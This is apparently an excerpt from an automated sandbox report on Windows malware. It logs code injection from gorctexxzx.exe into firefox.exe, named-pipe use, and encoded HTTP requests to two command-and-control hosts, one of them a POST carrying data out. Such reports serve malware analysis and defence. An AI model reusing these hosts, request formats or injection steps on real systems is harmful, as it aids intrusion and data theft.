| Get Address | c:\windows\system32\user32.dll | function = OemToCharA, address_out = 0x77b2f041 |
|
1 | |
| Get Address | c:\windows\system32\user32.dll | function = wsprintfA, address_out = 0x77ae3f47 |
|
1 | |
| Get Address | c:\windows\system32\user32.dll | function = wsprintfW, address_out = 0x77af426d |
|
1 |
System (6)
| Operation | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|
| Get Time | type = System Time, time = 2018-04-29 13:06:30 (UTC) |
|
2 | |
| Get Time | type = Ticks, time = 99887 |
|
1 | |
| Get Info | type = System Directory, result_out = C:\Windows\system32 |
|
2 | |
| Get Info | type = Operating System |
|
1 |
Environment (3)
| Operation | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|
| Get Environment String | - |
|
1 | |
| Get Environment String | name = APPDATA, result_out = C:\Users\EEBsYm5\AppData\Roaming |
|
2 |
Process #74: firefox.exe
64
22
| Information | Value |
|---|---|
| ID | #74 |
| File Name | c:\program files\mozilla firefox\firefox.exe |
| Command Line | "c:\program files\mozilla firefox\firefox.exe" |
| Initial Working Directory | C:\Windows\system32\ |
| Monitor | Start Time: 00:00:52, Reason: Child Process |
| Unmonitor | End Time: 00:02:29, Reason: Terminated by Timeout |
| Monitor Duration | 00:01:37 |
OS Process Information
| Information | Value |
|---|---|
| PID | 0xed8 |
| Parent PID | 0xaac (c:\windows\system32\gorctexxzx.exe) |
| Is Created or Modified Executable |
|
| Integrity Level | High (Elevated) |
| Username | CRH2YWU7\EEBsYm5 |
| Enabled Privileges | SeChangeNotifyPrivilege, SeImpersonatePrivilege, SeCreateGlobalPrivilege |
| Thread IDs |
0x
EDC
0x
EE0
0x
EE4
0x
EE8
0x
EEC
0x
EF0
0x
EF4
0x
EF8
0x
F2C
|
Region
| Name | Start VA | End VA | Type | Permissions | Monitored | Dumped | YARA | Actions |
|---|---|---|---|---|---|---|---|---|
| private_0x0000000000010000 | 0x00010000 | 0x0002ffff | Private Memory | Readable, Writable |
|
|
|
- |
| pagefile_0x0000000000010000 | 0x00010000 | 0x0001ffff | Pagefile Backed Memory | Readable, Writable |
|
|
|
- |
| private_0x0000000000020000 | 0x00020000 | 0x00020fff | Private Memory | Readable, Writable |
|
|
|
- |
| pagefile_0x0000000000030000 | 0x00030000 | 0x00033fff | Pagefile Backed Memory | Readable |
|
|
|
- |
| pagefile_0x0000000000040000 | 0x00040000 | 0x00042fff | Pagefile Backed Memory | Readable |
|
|
|
- |
| private_0x0000000000050000 | 0x00050000 | 0x00053fff | Private Memory | Readable, Writable |
|
|
|
- |
| locale.nls | 0x00060000 | 0x000c6fff | Memory Mapped File | Readable |
|
|
|
- |
| pagefile_0x00000000000d0000 | 0x000d0000 | 0x00197fff | Pagefile Backed Memory | Readable |
|
|
|
- |
| private_0x00000000001a0000 | 0x001a0000 | 0x001a0fff | Private Memory | Readable, Writable |
|
|
|
- |
| private_0x00000000001b0000 | 0x001b0000 | 0x002affff | Private Memory | Readable, Writable |
|
|
|
- |
| pagefile_0x00000000002b0000 | 0x002b0000 | 0x003b0fff | Pagefile Backed Memory | Readable |
|
|
|
- |
| pagefile_0x00000000003c0000 | 0x003c0000 | 0x003c1fff | Pagefile Backed Memory | Readable |
|
|
|
- |
| windowsshell.manifest | 0x003d0000 | 0x003d0fff | Memory Mapped File | Readable |
|
|
|
- |
| pagefile_0x00000000003d0000 | 0x003d0000 | 0x003d0fff | Pagefile Backed Memory | Readable, Writable |
|
|
|
- |
| private_0x00000000003e0000 | 0x003e0000 | 0x003effff | Private Memory | Readable, Writable |
|
|
|
- |
| pagefile_0x00000000003f0000 | 0x003f0000 | 0x003f1fff | Pagefile Backed Memory | Readable |
|
|
|
- |
| index.dat | 0x00400000 | 0x0042bfff | Memory Mapped File | Readable, Writable |
|
|
|
- |
| private_0x0000000000430000 | 0x00430000 | 0x0052ffff | Private Memory | Readable, Writable |
|
|
|
- |
| index.dat | 0x00530000 | 0x00537fff | Memory Mapped File | Readable, Writable |
|
|
|
- |
| index.dat | 0x00540000 | 0x0054ffff | Memory Mapped File | Readable, Writable |
|
|
|
- |
| private_0x0000000000550000 | 0x00550000 | 0x0064ffff | Private Memory | Readable, Writable |
|
|
|
- |
| private_0x0000000000550000 | 0x00550000 | 0x00550fff | Private Memory | Readable, Writable |
|
|
|
- |
| pagefile_0x0000000000550000 | 0x00550000 | 0x00550fff | Pagefile Backed Memory | Readable |
|
|
|
- |
| pagefile_0x0000000000560000 | 0x00560000 | 0x00560fff | Pagefile Backed Memory | Readable |
|
|
|
- |
| pagefile_0x0000000000570000 | 0x00570000 | 0x00570fff | Pagefile Backed Memory | Readable |
|
|
|
- |
| pagefile_0x0000000000580000 | 0x00580000 | 0x00580fff | Pagefile Backed Memory | Readable, Writable |
|
|
|
- |
| pagefile_0x0000000000590000 | 0x00590000 | 0x00596fff | Pagefile Backed Memory | Readable |
|
|
|
- |
| pagefile_0x00000000005a0000 | 0x005a0000 | 0x005a1fff | Pagefile Backed Memory | Readable, Writable |
|
|
|
- |
| urlmon.dll.mui | 0x005b0000 | 0x005b7fff | Memory Mapped File | Readable, Writable |
|
|
|
- |
| private_0x0000000000610000 | 0x00610000 | 0x0064ffff | Private Memory | Readable, Writable |
|
|
|
- |
| private_0x0000000000680000 | 0x00680000 | 0x0068ffff | Private Memory | Readable, Writable |
|
|
|
- |
| private_0x00000000006c0000 | 0x006c0000 | 0x006fffff | Private Memory | Readable, Writable |
|
|
|
- |
| sortdefault.nls | 0x00700000 | 0x009cefff | Memory Mapped File | Readable |
|
|
|
- |
| private_0x00000000009d0000 | 0x009d0000 | 0x00acffff | Private Memory | Readable, Writable |
|
|
|
- |
| firefox.exe | 0x00ad0000 | 0x00b13fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| pagefile_0x0000000000b20000 | 0x00b20000 | 0x0171ffff | Pagefile Backed Memory | Readable |
|
|
|
- |
| private_0x0000000001730000 | 0x01730000 | 0x0182ffff | Private Memory | Readable, Writable |
|
|
|
- |
| private_0x0000000001850000 | 0x01850000 | 0x0194ffff | Private Memory | Readable, Writable |
|
|
|
- |
| private_0x0000000001a10000 | 0x01a10000 | 0x01b0ffff | Private Memory | Readable, Writable |
|
|
|
- |
| private_0x0000000001bb0000 | 0x01bb0000 | 0x01caffff | Private Memory | Readable, Writable |
|
|
|
- |
| private_0x0000000001cb0000 | 0x01cb0000 | 0x01e5ffff | Private Memory | Readable, Writable |
|
|
|
- |
| private_0x0000000001cb0000 | 0x01cb0000 | 0x01e4ffff | Private Memory | Readable, Writable |
|
|
|
- |
| private_0x0000000001d30000 | 0x01d30000 | 0x01e2ffff | Private Memory | Readable, Writable |
|
|
|
- |
| private_0x0000000001e40000 | 0x01e40000 | 0x01e4ffff | Private Memory | Readable, Writable |
|
|
|
- |
| private_0x0000000001e50000 | 0x01e50000 | 0x01e5ffff | Private Memory | Readable, Writable |
|
|
|
- |
| private_0x0000000001e60000 | 0x01e60000 | 0x0205ffff | Private Memory | Readable, Writable |
|
|
|
- |
| private_0x0000000001e60000 | 0x01e60000 | 0x01f5ffff | Private Memory | Readable, Writable |
|
|
|
- |
| private_0x0000000002020000 | 0x02020000 | 0x0205ffff | Private Memory | Readable, Writable |
|
|
|
- |
| private_0x0000000002060000 | 0x02060000 | 0x0215ffff | Private Memory | Readable, Writable |
|
|
|
- |
| private_0x0000000002300000 | 0x02300000 | 0x023fffff | Private Memory | Readable, Writable |
|
|
|
- |
| private_0x0000000002490000 | 0x02490000 | 0x0258ffff | Private Memory | Readable, Writable |
|
|
|
- |
| npmproxy.dll | 0x6efd0000 | 0x6efd7fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| rasadhlp.dll | 0x6f850000 | 0x6f855fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| msvcr100.dll | 0x700b0000 | 0x7016dfff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| netprofm.dll | 0x70600000 | 0x70659fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| sensapi.dll | 0x72f30000 | 0x72f35fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| rasman.dll | 0x73730000 | 0x73744fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| rasapi32.dll | 0x73750000 | 0x737a1fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| dhcpcsvc.dll | 0x73fc0000 | 0x73fd1fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| fwpuclnt.dll | 0x73fe0000 | 0x74017fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| dhcpcsvc6.dll | 0x74030000 | 0x7403cfff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| winnsi.dll | 0x74120000 | 0x74126fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| iphlpapi.dll | 0x74130000 | 0x7414bfff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| nlaapi.dll | 0x74240000 | 0x7424ffff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| ntmarta.dll | 0x74550000 | 0x74570fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| rtutils.dll | 0x74650000 | 0x7465cfff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| winrnr.dll | 0x74880000 | 0x74887fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| pnrpnsp.dll | 0x74890000 | 0x748a1fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| napinsp.dll | 0x748c0000 | 0x748cffff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| comctl32.dll | 0x74eb0000 | 0x7504dfff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| version.dll | 0x75420000 | 0x75428fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| wshtcpip.dll | 0x754b0000 | 0x754b4fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| rsaenh.dll | 0x75740000 | 0x7577afff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| dnsapi.dll | 0x75820000 | 0x75863fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| wship6.dll | 0x75950000 | 0x75955fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| mswsock.dll | 0x75960000 | 0x7599bfff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| cryptsp.dll | 0x759a0000 | 0x759b5fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| sspicli.dll | 0x75e00000 | 0x75e1afff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| cryptbase.dll | 0x75e20000 | 0x75e2bfff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| rpcrtremote.dll | 0x75ec0000 | 0x75ecdfff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| profapi.dll | 0x75ed0000 | 0x75edafff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| msasn1.dll | 0x75f40000 | 0x75f4bfff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| kernelbase.dll | 0x75f70000 | 0x75fb9fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| crypt32.dll | 0x76050000 | 0x7616cfff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| kernel32.dll | 0x761d0000 | 0x762a3fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| imm32.dll | 0x762b0000 | 0x762cefff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| nsi.dll | 0x762d0000 | 0x762d5fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| sechost.dll | 0x762e0000 | 0x762f8fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| shlwapi.dll | 0x76300000 | 0x76356fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| wldap32.dll | 0x763a0000 | 0x763e4fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| iertutil.dll | 0x763f0000 | 0x765eafff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| lpk.dll | 0x765f0000 | 0x765f9fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| wininet.dll | 0x76600000 | 0x766f4fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| advapi32.dll | 0x76700000 | 0x7679ffff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| shell32.dll | 0x767a0000 | 0x773e9fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| usp10.dll | 0x773f0000 | 0x7748cfff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| ws2_32.dll | 0x77510000 | 0x77544fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| rpcrt4.dll | 0x77550000 | 0x775f0fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| clbcatq.dll | 0x77600000 | 0x77682fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| oleaut32.dll | 0x77690000 | 0x7771efff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| msvcrt.dll | 0x77720000 | 0x777cbfff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| urlmon.dll | 0x77830000 | 0x77965fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| ole32.dll | 0x77970000 | 0x77acbfff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| user32.dll | 0x77ad0000 | 0x77b98fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| msctf.dll | 0x77ba0000 | 0x77c6bfff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| gdi32.dll | 0x77c80000 | 0x77ccdfff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| apisetschema.dll | 0x77e80000 | 0x77e80fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| ntdll.dll | 0x77ec0000 | 0x77ffbfff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| pagefile_0x000000007f6f0000 | 0x7f6f0000 | 0x7f7effff | Pagefile Backed Memory | Readable |
|
|
|
- |
| pagefile_0x000000007ffb0000 | 0x7ffb0000 | 0x7ffd2fff | Pagefile Backed Memory | Readable |
|
|
|
- |
| private_0x000000007ffd6000 | 0x7ffd6000 | 0x7ffd6fff | Private Memory | Readable, Writable |
|
|
|
- |
| private_0x000000007ffd7000 | 0x7ffd7000 | 0x7ffd7fff | Private Memory | Readable, Writable |
|
|
|
- |
| private_0x000000007ffd8000 | 0x7ffd8000 | 0x7ffd8fff | Private Memory | Readable, Writable |
|
|
|
- |
| private_0x000000007ffd9000 | 0x7ffd9000 | 0x7ffd9fff | Private Memory | Readable, Writable |
|
|
|
- |
| private_0x000000007ffda000 | 0x7ffda000 | 0x7ffdafff | Private Memory | Readable, Writable |
|
|
|
- |
| private_0x000000007ffdb000 | 0x7ffdb000 | 0x7ffdbfff | Private Memory | Readable, Writable |
|
|
|
- |
| private_0x000000007ffdc000 | 0x7ffdc000 | 0x7ffdcfff | Private Memory | Readable, Writable |
|
|
|
- |
| private_0x000000007ffdd000 | 0x7ffdd000 | 0x7ffddfff | Private Memory | Readable, Writable |
|
|
|
- |
| private_0x000000007ffde000 | 0x7ffde000 | 0x7ffdefff | Private Memory | Readable, Writable |
|
|
|
- |
| private_0x000000007ffdf000 | 0x7ffdf000 | 0x7ffdffff | Private Memory | Readable, Writable |
|
|
|
- |
Injection Information
| Injection Type | Source Process | Source Os Thread ID | Information | Success | Count | Logfile |
|---|---|---|---|---|---|---|
| Modify Memory | #8: c:\windows\system32\gorctexxzx.exe | 0xecc | address = 0x50000, size = 14348 |
|
1 | |
| Create Remote Thread | #8: c:\windows\system32\gorctexxzx.exe | 0xecc | address = 0x50202 |
|
1 |
Host Behavior
File (6)
| Operation | Filename | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| Create Pipe | \device\namedpipe\c41b2304 | open_mode = PIPE_ACCESS_INBOUND, PIPE_ACCESS_OUTBOUND, FILE_FLAG_OVERLAPPED, pipe_mode = PIPE_READMODE_MESSAGE, PIPE_TYPE_MESSAGE, max_instances = 1 |
|
1 | |
| Read | - | size = 65535, size_out = 138 |
|
1 | |
| Read | - | size = 65535, size_out = 0 |
|
1 | |
| Read | - | size = 65535, size_out = 8 |
|
1 | |
| Write | - | size = 13 |
|
1 | |
| Write | - | size = 308 |
|
1 |
Module (55)
| Operation | Module | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| Load | msvcrt.dll | base_address = 0x77720000 |
|
1 | |
| Load | WinInet.dll | base_address = 0x76600000 |
|
1 | |
| Load | urlmon.dll | base_address = 0x77830000 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = LoadLibraryW, address_out = 0x76223c01 |
|
1 | |
| Get Address | c:\windows\system32\msvcrt.dll | function = malloc, address_out = 0x77729cee |
|
1 | |
| Get Address | c:\windows\system32\msvcrt.dll | function = free, address_out = 0x77729894 |
|
1 | |
| Get Address | c:\windows\system32\msvcrt.dll | function = memcpy, address_out = 0x77729910 |
|
1 | |
| Get Address | c:\windows\system32\msvcrt.dll | function = memset, address_out = 0x77729790 |
|
1 | |
| Get Address | c:\windows\system32\msvcrt.dll | function = realloc, address_out = 0x7772b10d |
|
1 | |
| Get Address | c:\windows\system32\msvcrt.dll | function = _snwprintf, address_out = 0x777495d1 |
|
1 | |
| Get Address | c:\windows\system32\msvcrt.dll | function = sprintf, address_out = 0x7773d354 |
|
1 | |
| Get Address | c:\windows\system32\msvcrt.dll | function = srand, address_out = 0x7772f757 |
|
1 | |
| Get Address | c:\windows\system32\msvcrt.dll | function = rand, address_out = 0x7772c070 |
|
1 | |
| Get Address | c:\windows\system32\msvcrt.dll | function = strlen, address_out = 0x777343d3 |
|
1 | |
| Get Address | c:\windows\system32\msvcrt.dll | function = _vsnprintf, address_out = 0x7772d1a8 |
|
1 | |
| Get Address | c:\windows\system32\msvcrt.dll | function = _snprintf, address_out = 0x7774fa7c |
|
1 | |
| Get Address | c:\windows\system32\msvcrt.dll | function = strtok, address_out = 0x7772df1f |
|
1 | |
| Get Address | c:\windows\system32\msvcrt.dll | function = strcmp, address_out = 0x77738b11 |
|
1 | |
| Get Address | c:\windows\system32\msvcrt.dll | function = strncpy, address_out = 0x777308a9 |
|
1 | |
| Get Address | c:\windows\system32\msvcrt.dll | function = atoi, address_out = 0x7772dbe0 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = CreateEventW, address_out = 0x76223386 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = CreateNamedPipeW, address_out = 0x7620270f |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = CreateFileW, address_out = 0x7621cc56 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = SetNamedPipeHandleState, address_out = 0x7622f420 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = SetEvent, address_out = 0x7621bccc |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = WaitForSingleObject, address_out = 0x7621ba90 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = GetOverlappedResult, address_out = 0x76212f04 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = ConnectNamedPipe, address_out = 0x76202727 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = GetLastError, address_out = 0x7621bf00 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = ReadFile, address_out = 0x762196fb |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = FlushFileBuffers, address_out = 0x76207f81 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = DisconnectNamedPipe, address_out = 0x7622f438 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = CloseHandle, address_out = 0x7621ca7c |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = WriteFile, address_out = 0x76221400 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = GetComputerNameW, address_out = 0x762103ff |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = OpenEventW, address_out = 0x7621548b |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = ResetEvent, address_out = 0x7621bcb4 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = GetSystemTime, address_out = 0x7621ced8 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = ExitProcess, address_out = 0x7622214f |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = SetLastError, address_out = 0x7621bb08 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = OutputDebugStringA, address_out = 0x7620eb36 |
|
1 | |
| Get Address | c:\windows\system32\wininet.dll | function = HttpSendRequestExA, address_out = 0x76691812 |
|
1 | |
| Get Address | c:\windows\system32\wininet.dll | function = HttpQueryInfoA, address_out = 0x7661a33e |
|
1 | |
| Get Address | c:\windows\system32\wininet.dll | function = InternetConnectA, address_out = 0x766249e9 |
|
1 | |
| Get Address | c:\windows\system32\wininet.dll | function = InternetReadFile, address_out = 0x7661b406 |
|
1 | |
| Get Address | c:\windows\system32\wininet.dll | function = InternetWriteFile, address_out = 0x766346da |
|
1 | |
| Get Address | c:\windows\system32\wininet.dll | function = HttpOpenRequestA, address_out = 0x76624c7d |
|
1 | |
| Get Address | c:\windows\system32\wininet.dll | function = HttpEndRequestA, address_out = 0x766345ea |
|
1 | |
| Get Address | c:\windows\system32\wininet.dll | function = HttpAddRequestHeadersA, address_out = 0x7661dcd2 |
|
1 | |
| Get Address | c:\windows\system32\wininet.dll | function = HttpSendRequestA, address_out = 0x766918f8 |
|
1 | |
| Get Address | c:\windows\system32\wininet.dll | function = InternetOpenA, address_out = 0x7662f18e |
|
1 | |
| Get Address | c:\windows\system32\wininet.dll | function = InternetCloseHandle, address_out = 0x7661ab49 |
|
1 | |
| Get Address | c:\windows\system32\wininet.dll | function = InternetQueryOptionA, address_out = 0x76611b56 |
|
1 | |
| Get Address | c:\windows\system32\wininet.dll | function = InternetSetOptionA, address_out = 0x766175e8 |
|
1 | |
| Get Address | c:\windows\system32\urlmon.dll | function = ObtainUserAgentString, address_out = 0x77861d76 |
|
1 |
System (3)
| Operation | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|
| Get Computer Name | result_out = CRH2YWU7 |
|
2 | |
| Get Time | type = System Time, time = 2018-04-29 13:07:01 (UTC) |
|
1 |
Network Behavior
HTTP Sessions (2)
| Information | Value |
|---|---|
| Total Data Sent | 971 bytes |
| Total Data Received | 4.40 KB |
| Contacted Host Count | 2 |
| Contacted Hosts | webonline.mefound.com, easport-news.publicvm.com |
HTTP Session #1
| Information | Value |
|---|---|
| User Agent | Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; InfoPath.3; .NET4.0C; .NET4.0E) |
| Server Name | webonline.mefound.com |
| Server Port | 0 |
| Data Sent | 449 |
| Data Received | 4 |
| Operation | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|
| Open Session | user_agent = Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; InfoPath.3; .NET4.0C; .NET4.0E), access_type = INTERNET_OPEN_TYPE_PRECONFIG |
|
1 | |
| Open Connection | protocol = HTTP, server_name = webonline.mefound.com, server_port = 0 |
|
1 | |
| Open HTTP Request | http_verb = GET, http_version = HTTP/1.1, target_resource = index/index.php?h=TQz6H5GI8zI%3d&d=TQz%2f%2fCqWZDJNDfUup77CB3U%2bzyihu8MGfTz6H5GI8zJNDPofkYh%3d, accept_types = 0, flags = INTERNET_FLAG_KEEP_CONNECTION, INTERNET_FLAG_NO_CACHE_WRITE |
|
1 | |
| Add HTTP Request Headers | headers = Accept: */* |
|
1 | |
| Send HTTP Request | headers = WINHTTP_NO_ADDITIONAL_HEADERS, url = webonline.mefound.com/index/index.php?h=TQz6H5GI8zI%3d&d=TQz%2f%2fCqWZDJNDfUup77CB3U%2bzyihu8MGfTz6H5GI8zJNDPofkYh%3d |
|
1 | |
| Query HTTP Info | flags = HTTP_QUERY_FLAG_NUMBER, HTTP_QUERY_STATUS_CODE, size_out = 4 |
|
1 | |
| Close Session | - |
|
2 |
HTTP Session #2
| Information | Value |
|---|---|
| User Agent | Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; InfoPath.3; .NET4.0C; .NET4.0E) |
| Server Name | easport-news.publicvm.com |
| Server Port | 0 |
| Data Sent | 522 |
| Data Received | 4498 |
| Operation | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|
| Open Session | user_agent = Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; InfoPath.3; .NET4.0C; .NET4.0E), access_type = INTERNET_OPEN_TYPE_PRECONFIG |
|
1 | |
| Open Connection | protocol = HTTP, server_name = easport-news.publicvm.com, server_port = 0 |
|
1 | |
| Open HTTP Request | http_verb = POST, http_version = HTTP/1.1, target_resource = index/index.php?h=LIFUEDEFV6c%3d&d=LoFR84obwKcsgFshBzNmkhSzYScBNmeTHLFUEDEFV6csgVQQMQVmkRqwYSgDMGCXH7FgIAFBZpYdtWQhAzxnkwLrJHcRJXeHDKF0MBEld4cMoXQwESV3h8%3d%3d, accept_types = 0, flags = INTERNET_FLAG_KEEP_CONNECTION, INTERNET_FLAG_NO_CACHE_WRITE |
|
1 | |
| Add HTTP Request Headers | headers = Content-Type: multipart/form-data; boundary=---------------------------371c798360121a |
|
1 | |
| Send HTTP Request | url = easport-news.publicvm.com/index/index.php?h=LIFUEDEFV6c%3d&d=LoFR84obwKcsgFshBzNmkhSzYScBNmeTHLFUEDEFV6csgVQQMQVmkRqwYSgDMGCXH7FgIAFBZpYdtWQhAzxnkwLrJHcRJXeHDKF0MBEld4cMoXQwESV3h8%3d%3d |
|
1 | |
| Add HTTP Request Data | size = 133, size_out = 133 |
|
1 | |
| Add HTTP Request Data | size = 4004, size_out = 4004 |
|
1 | |
| Add HTTP Request Data | size = 49, size_out = 49 |
|
1 | |
| Query HTTP Info | flags = HTTP_QUERY_FLAG_NUMBER, HTTP_QUERY_STATUS_CODE, size_out = 4 |
|
1 | |
| Query HTTP Info | flags = HTTP_QUERY_FLAG_NUMBER, HTTP_QUERY_CONTENT_LENGTH, size_out = 4 |
|
1 | |
| Read Response | size = 16384, size_out = 304 |
|
1 | |
| Read Response | size = 16384, size_out = 0 |
|
1 | |
| Close Session | - |
|
2 |
Process #76: firefox.exe
64
22
| Information | Value |
|---|---|
| ID | #76 |
| File Name | c:\program files\mozilla firefox\firefox.exe |
| Command Line | "c:\program files\mozilla firefox\firefox.exe" |
| Initial Working Directory | C:\Windows\system32\ |
| Monitor | Start Time: 00:01:20, Reason: Child Process |
| Unmonitor | End Time: 00:02:29, Reason: Terminated by Timeout |
| Monitor Duration | 00:01:09 |
OS Process Information
| Information | Value |
|---|---|
| PID | 0xfdc |
| Parent PID | 0xaac (c:\windows\system32\gorctexxzx.exe) |
| Is Created or Modified Executable |
|
| Integrity Level | High (Elevated) |
| Username | CRH2YWU7\EEBsYm5 |
| Enabled Privileges | SeChangeNotifyPrivilege, SeImpersonatePrivilege, SeCreateGlobalPrivilege |
| Thread IDs |
0x
FE0
0x
FE4
0x
FE8
0x
FEC
0x
FF0
0x
FF4
0x
FF8
0x
FFC
0x
114
|
Region
| Name | Start VA | End VA | Type | Permissions | Monitored | Dumped | YARA | Actions |
|---|---|---|---|---|---|---|---|---|
| private_0x0000000000010000 | 0x00010000 | 0x0002ffff | Private Memory | Readable, Writable |
|
|
|
- |
| pagefile_0x0000000000010000 | 0x00010000 | 0x0001ffff | Pagefile Backed Memory | Readable, Writable |
|
|
|
- |
| private_0x0000000000020000 | 0x00020000 | 0x00020fff | Private Memory | Readable, Writable |
|
|
|
- |
| private_0x0000000000030000 | 0x00030000 | 0x0012ffff | Private Memory | Readable, Writable |
|
|
|
- |
| pagefile_0x0000000000130000 | 0x00130000 | 0x00133fff | Pagefile Backed Memory | Readable |
|
|
|
- |
| pagefile_0x0000000000140000 | 0x00140000 | 0x00142fff | Pagefile Backed Memory | Readable |
|
|
|
- |
| private_0x0000000000150000 | 0x00150000 | 0x00153fff | Private Memory | Readable, Writable |
|
|
|
- |
| private_0x0000000000160000 | 0x00160000 | 0x00160fff | Private Memory | Readable, Writable |
|
|
|
- |
| pagefile_0x0000000000170000 | 0x00170000 | 0x00171fff | Pagefile Backed Memory | Readable |
|
|
|
- |
| private_0x0000000000180000 | 0x00180000 | 0x0027ffff | Private Memory | Readable, Writable |
|
|
|
- |
| locale.nls | 0x00280000 | 0x002e6fff | Memory Mapped File | Readable |
|
|
|
- |
| windowsshell.manifest | 0x002f0000 | 0x002f0fff | Memory Mapped File | Readable |
|
|
|
- |
| pagefile_0x00000000002f0000 | 0x002f0000 | 0x002f0fff | Pagefile Backed Memory | Readable, Writable |
|
|
|
- |
| pagefile_0x0000000000300000 | 0x00300000 | 0x00301fff | Pagefile Backed Memory | Readable |
|
|
|
- |
| private_0x0000000000310000 | 0x00310000 | 0x0034ffff | Private Memory | Readable, Writable |
|
|
|
- |
